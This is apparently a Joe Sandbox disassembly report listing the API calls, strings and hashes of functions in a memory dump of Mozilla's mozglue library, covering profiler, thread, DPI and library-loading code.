GetSystemMetricsForDpi, xrefs: 6CBE5677
SetWindowPos, xrefs: 6CBE56F7
GetThreadDpiAwarenessContext, xrefs: 6CBE562D
gdi32, xrefs: 6CBE560A
GetDpiForWindow, xrefs: 6CBE5690
user32, xrefs: 6CBE5601
CreateSolidBrush, xrefs: 6CBE57E4
ShowWindow, xrefs: 6CBE56DE
CreateWindowExW, xrefs: 6CBE56C5
FillRect, xrefs: 6CBE5729
GetMonitorInfoW, xrefs: 6CBE57A2
ReleaseDC, xrefs: 6CBE5742
RegisterClassW, xrefs: 6CBE56AC

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: a0b360edbf7e318a16c348832e80d464306324926e9f97a0be70b53fc096d6d8
Instruction ID: 4c1f53452def108f47a6c831d7c5a91257156d27cde493bbfcecc06291c2043c
Opcode Fuzzy Hash: a0b360edbf7e318a16c348832e80d464306324926e9f97a0be70b53fc096d6d8
Instruction Fuzzy Hash: CE512E747017436FEB009F758E5492A3BFCAF0A785712442DA961E2B92EB72CC05CF69

Function 6CBCCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CB9582D), ref: 6CBCCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CB9582D), ref: 6CBCCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CBFFE98,?,?,?,?,?,6CB9582D), ref: 6CBCCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CB9582D), ref: 6CBCCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CB9582D), ref: 6CBCCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CB9582D), ref: 6CBCCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB9582D), ref: 6CBCCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CBCCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CBCCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CBCCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CBCCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CBCCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CBCCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CBCCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CBCCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CBCCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CBCCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CBCCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CBCCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CBCCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CBCCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CBCCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CBCCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CBCCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CBCCE8A

Strings

fileio, xrefs: 6CBCCC92
cpuallthreads, xrefs: 6CBCCE16
samplingallthreads, xrefs: 6CBCCE2C
fileioall, xrefs: 6CBCCCA8
jsallocations, xrefs: 6CBCCD0E
screenshots, xrefs: 6CBCCCD4
default, xrefs: 6CBCCC21
power, xrefs: 6CBCCE84
stackwalk, xrefs: 6CBCCCF8
noiostacks, xrefs: 6CBCCCBE
leaf, xrefs: 6CBCCC66
unregisteredthreads, xrefs: 6CBCCE58
java, xrefs: 6CBCCC37
markersallthreads, xrefs: 6CBCCE42
processcpu, xrefs: 6CBCCE6E
preferencereads, xrefs: 6CBCCD92
notimerresolutionchange, xrefs: 6CBCCE00
nostacksampling, xrefs: 6CBCCD7C
ipcmessages, xrefs: 6CBCCDBE
mainthreadio, xrefs: 6CBCCC7C
Unrecognized feature "%s"., xrefs: 6CBCCEA0
audiocallbacktracing, xrefs: 6CBCCDD4
seqstyle, xrefs: 6CBCCCE6
nativeallocations, xrefs: 6CBCCDA8

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 1fc99fd760428e88d0942d5faafabc349e2e97915e3d07aee27869da73c4d7d1
Instruction ID: 6f52d47c95aa0edd2295ef50686c88ab53125847174e40d347293f019798e9f0
Opcode Fuzzy Hash: 1fc99fd760428e88d0942d5faafabc349e2e97915e3d07aee27869da73c4d7d1
Instruction Fuzzy Hash: B051A8D1B052F522FE1035155C10BAF1444EB7338BF15043AED29A2F80FB56AA9F86B7

Function 6CB94470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB94730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CB944B2,6CC0E21C,6CC0F7F8), ref: 6CB9473E
Part of subcall function 6CB94730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CB9474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CB944BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CB944D2
InitOnceExecuteOnce.KERNEL32(6CC0F80C,6CB8F240,?,?), ref: 6CB9451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CB9455C
LoadLibraryW.KERNEL32(?), ref: 6CB94592
InitializeCriticalSection.KERNEL32(6CC0F770), ref: 6CB945A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CB945AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CB945BB
InitOnceExecuteOnce.KERNEL32(6CC0F818,6CB8F240,?,?), ref: 6CB94612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CB94636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CB94644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CB9466D
VerSetConditionMask.NTDLL ref: 6CB9469F
VerSetConditionMask.NTDLL ref: 6CB946AB
VerSetConditionMask.NTDLL ref: 6CB946B2
VerSetConditionMask.NTDLL ref: 6CB946B9
VerSetConditionMask.NTDLL ref: 6CB946C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CB946CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CB946F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CB946FD

Strings

l, xrefs: 6CB94578
NativeNtBlockSet_Write, xrefs: 6CB946F7
kernel32.dll, xrefs: 6CB944CD
WRusr.dll, xrefs: 6CB944B5
user32.dll, xrefs: 6CB94557, 6CB9463F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: 89c1f9dcd72e30f197d401e2aa91e1f25e3e28c63cff3d3eb1328d0239bea8d5
Instruction ID: c62a6c70420162352a0eab4b5db59fc297f21597a831781c738c104a12a68746
Opcode Fuzzy Hash: 89c1f9dcd72e30f197d401e2aa91e1f25e3e28c63cff3d3eb1328d0239bea8d5
Instruction Fuzzy Hash: 2761F6B0B04388AFEB10DF64CC45B997BB8FB47708F0586ACE5549B641E7728985CF52

Function 6CBCF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CBCF8F9

Part of subcall function 6CB96390: GetCurrentThreadId.KERNEL32 ref: 6CB963D0
Part of subcall function 6CB96390: AcquireSRWLockExclusive.KERNEL32 ref: 6CB963DF
Part of subcall function 6CB96390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CB9640E

ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCF93A
GetCurrentThreadId.KERNEL32 ref: 6CBCF98A
GetCurrentThreadId.KERNEL32 ref: 6CBCF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCF716

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

Part of subcall function 6CB8B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CB8B5E0

GetCurrentThreadId.KERNEL32 ref: 6CBCF739
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCF746
GetCurrentThreadId.KERNEL32 ref: 6CBCF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC0385B,00000002,?,?,?,?,?), ref: 6CBCF829
free.MOZGLUE(?,?,00000000,?), ref: 6CBCF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CBCF866
free.MOZGLUE(?), ref: 6CBCFA0C

Part of subcall function 6CB95E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB955E1), ref: 6CB95E8C
Part of subcall function 6CB95E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB95E9D
Part of subcall function 6CB95E60: GetCurrentThreadId.KERNEL32 ref: 6CB95EAB
Part of subcall function 6CB95E60: GetCurrentThreadId.KERNEL32 ref: 6CB95EB8
Part of subcall function 6CB95E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB95ECF
Part of subcall function 6CB95E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CB95F27
Part of subcall function 6CB95E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CB95F47
Part of subcall function 6CB95E60: GetCurrentProcess.KERNEL32 ref: 6CB95F53
Part of subcall function 6CB95E60: GetCurrentThread.KERNEL32 ref: 6CB95F5C
Part of subcall function 6CB95E60: GetCurrentProcess.KERNEL32 ref: 6CB95F66
Part of subcall function 6CB95E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CB95F7E

free.MOZGLUE(?), ref: 6CBCF9C5
free.MOZGLUE(?), ref: 6CBCF9DA

Strings

[D %d/%d] profiler_register_thread(%s), xrefs: 6CBCF71F
" attempted to re-register as ", xrefs: 6CBCF858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CBCF9A6
Thread , xrefs: 6CBCF789

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 71adcab0409e80b0a060b99eafc5deda77f2f7f9212a801f06178b74ca0c0b3c
Instruction ID: 34afcc799a4c6afda494056e5be76ed5b344e37d8965be556e1eb7dd7f745a37
Opcode Fuzzy Hash: 71adcab0409e80b0a060b99eafc5deda77f2f7f9212a801f06178b74ca0c0b3c
Instruction Fuzzy Hash: 0C813370B047809FDB10DF64C840AAEB7B5EF85308F45456DE8859BB51EB31D949CBA3

Function 6CB95E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB95E9D

Part of subcall function 6CBA5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5B85
Part of subcall function 6CBA5B50: EnterCriticalSection.KERNEL32(6CC0F688,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5B90
Part of subcall function 6CBA5B50: LeaveCriticalSection.KERNEL32(6CC0F688,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5BD8
Part of subcall function 6CBA5B50: GetTickCount64.KERNEL32 ref: 6CBA5BE4

GetCurrentThreadId.KERNEL32 ref: 6CB95EAB
GetCurrentThreadId.KERNEL32 ref: 6CB95EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB95ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CB96017

Part of subcall function 6CB84310: moz_xmalloc.MOZGLUE(00000010,?,6CB842D2), ref: 6CB8436A
Part of subcall function 6CB84310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CB842D2), ref: 6CB84387

moz_xmalloc.MOZGLUE(00000004), ref: 6CB95F47
GetCurrentProcess.KERNEL32 ref: 6CB95F53
GetCurrentThread.KERNEL32 ref: 6CB95F5C
GetCurrentProcess.KERNEL32 ref: 6CB95F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CB95F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6CB95F27

Part of subcall function 6CB9CA10: mozalloc_abort.MOZGLUE(?), ref: 6CB9CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB955E1), ref: 6CB95E8C

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB955E1), ref: 6CB9605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB955E1), ref: 6CB960CC

Strings

GeckoMain, xrefs: 6CB95ECE, 6CB96015

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 8ed462d7c21ff1fc5fc1b6f81ec164eb75904ca82ad6e6e61bcb9f937721a5bc
Instruction ID: 7183815e5f3cdf7266df0c4038795a76fc08f57ff8e41930a76db7fb8b857bd7
Opcode Fuzzy Hash: 8ed462d7c21ff1fc5fc1b6f81ec164eb75904ca82ad6e6e61bcb9f937721a5bc
Instruction Fuzzy Hash: 3471C2B06047809FDB10DF64C4C0A6ABBF0FF4A304F54496DE98687B52D731E988CB96

Function 6CB99590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB831C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CB83217
Part of subcall function 6CB831C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CB83236
Part of subcall function 6CB831C0: FreeLibrary.KERNEL32 ref: 6CB8324B
Part of subcall function 6CB831C0: __Init_thread_footer.LIBCMT ref: 6CB83260
Part of subcall function 6CB831C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CB8327F
Part of subcall function 6CB831C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB8328E
Part of subcall function 6CB831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CB832AB
Part of subcall function 6CB831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CB832D1
Part of subcall function 6CB831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CB832E5
Part of subcall function 6CB831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CB832F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CB99675
__Init_thread_footer.LIBCMT ref: 6CB99697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CB996E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CB99707
__Init_thread_footer.LIBCMT ref: 6CB9971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CB99773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CB997B7
FreeLibrary.KERNEL32 ref: 6CB997D0
FreeLibrary.KERNEL32 ref: 6CB997EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CB99824

Strings

NtMapViewOfSection, xrefs: 6CB99701
ntdll.dll, xrefs: 6CB996E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CB99670
MapViewOfFileNuma2, xrefs: 6CB997B1

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: a5b1c2980cef40e6f005c23b96734d8188686cd9ea460d8192d1ba37b6aefd0f
Instruction ID: be02bb3a831b77bcb8c37b28d51e9d00952465b9734268b2ae39e9b1651a4ada
Opcode Fuzzy Hash: a5b1c2980cef40e6f005c23b96734d8188686cd9ea460d8192d1ba37b6aefd0f
Instruction Fuzzy Hash: 4A61B071B002459FDF00DFACD884B9A7BB4FB4B755F12452DE91993780DB32A884CB92

Function 6CBE6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6CC0F618), ref: 6CBE6694
GetThreadId.KERNEL32(?), ref: 6CBE66B1
GetCurrentThreadId.KERNEL32 ref: 6CBE66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6CBE66E1
EnterCriticalSection.KERNEL32(6CC0F618), ref: 6CBE6734
GetCurrentProcess.KERNEL32 ref: 6CBE673A
LeaveCriticalSection.KERNEL32(6CC0F618), ref: 6CBE676C
GetCurrentThread.KERNEL32 ref: 6CBE67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CBE6868
RtlCaptureContext.NTDLL ref: 6CBE687F

Strings

WalkStack64, xrefs: 6CBE6890

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: e1d69c5de92e8cc43e6889134fdd49b0f3bd2714ebb6c45bf5669f3b83a1dea2
Instruction ID: b49b60b2ba4091bb025296e79aac3f99c8b2184e21c368b7c3e8a369e0343d33
Opcode Fuzzy Hash: e1d69c5de92e8cc43e6889134fdd49b0f3bd2714ebb6c45bf5669f3b83a1dea2
Instruction Fuzzy Hash: 6351BC71A09345AFD711CF25C844B5ABBF4FF89B54F01492DFAA887640D771E908CB92

Function 6CBCDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCDE73
GetCurrentThreadId.KERNEL32 ref: 6CBCDF7D
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCDF8A
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCDFC9
GetCurrentThreadId.KERNEL32 ref: 6CBCDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CB94A68), ref: 6CBCDE7B

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

Part of subcall function 6CBBCBE8: GetCurrentProcess.KERNEL32(?,6CB831A7), ref: 6CBBCBF1
Part of subcall function 6CBBCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB831A7), ref: 6CBBCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CB94A68), ref: 6CBCDEB8
free.MOZGLUE(00000000,?,6CB94A68), ref: 6CBCDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CBCDF38

Strings

<none>, xrefs: 6CBCDFD7
[I %d/%d] locked_profiler_stop, xrefs: 6CBCDE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CBCE00E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

